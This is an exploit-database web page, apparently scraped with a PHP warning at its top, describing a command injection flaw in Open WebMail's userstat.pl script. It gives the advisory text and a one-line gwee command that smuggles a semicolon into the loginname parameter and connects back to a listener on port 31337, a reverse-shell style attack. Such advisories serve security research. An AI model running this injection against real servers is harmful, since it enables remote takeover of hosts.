Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary Command Execution in Open WebMail - exploit.company
header-logo
Suggest Exploit
vendor:
Open WebMail
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: Open WebMail
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:open_webmail:open_webmail
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Arbitrary Command Execution in Open WebMail

A vulnerability in Open WebMail allows a remote attacker to execute arbitrary commands on a vulnerable host. The issue is caused by insufficient sanitization of shell metacharacters passed through URI parameters. By exploiting this vulnerability, a non-privileged user can remotely execute arbitrary commands in the context of the web server hosting the vulnerable application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10316/info

A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.

Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl

Navigation

Suggest Exploit

Services By CQR